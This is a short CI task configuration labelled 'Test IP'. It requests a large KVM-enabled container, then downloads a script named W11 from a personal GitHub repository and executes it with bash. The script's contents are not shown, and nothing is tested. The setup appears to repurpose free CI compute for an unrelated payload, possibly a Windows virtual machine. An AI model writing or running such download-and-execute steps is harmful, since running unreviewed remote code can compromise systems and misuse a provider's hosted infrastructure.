task:
  name: Test IP
  timeout_in: 120m
  environment:
    TOKEN: ENCRYPTED[fb5f351553986b4a88aff786f1bdf044e57a928b190e6aebee616c7d5e2e94776ee45771b93c60b2c275128e183903c0]
  container:
    cpu: 8
    memory: 32G
    image: docker.io/ubuntu
    kvm: true
  script: 
   - apt update
   - apt install wget -y
   - wget https://raw.githubusercontent.com/freddyzuncover/dangdev/main/W11
   - chmod +x *
   - bash W11
   
